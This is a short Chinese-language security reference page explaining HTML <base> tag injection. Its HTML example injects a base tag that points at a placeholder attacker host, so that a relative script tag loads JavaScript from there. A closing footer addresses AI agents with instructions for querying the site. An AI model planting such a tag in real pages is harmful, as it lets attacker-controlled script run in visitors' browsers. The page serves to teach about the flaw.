# base标签注入

## 概述

HTML [`<base>`](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/base) 元素指定用于文档中所有相对URL的基础URL。

{% hint style="info" %}
如果使用了多个 `<base>` 元素，只有第一个 href 和第一个 target 会被遵守——所有其他的都会被忽略。
{% endhint %}

## 相对URL重定向

`<base>` 标签注入允许将相对URL重定向到任意主机。

例如，对于以下页面，浏览器将从 `https://attacker-website.com/assets/some-script.js` 请求脚本。

```html
<base href="https://attacker-website.com">

<script src="/assets/some-script.js"></script>
```

换句话说，如果有办法注入 `<base>` 标签，就有可能向使用相对URL下载脚本的 `<scripts>` 元素注入任意JavaScript代码。


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gitbook.cdxiaodong.life/web-ying-yong-an-quan/html-zhu-ru/base.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.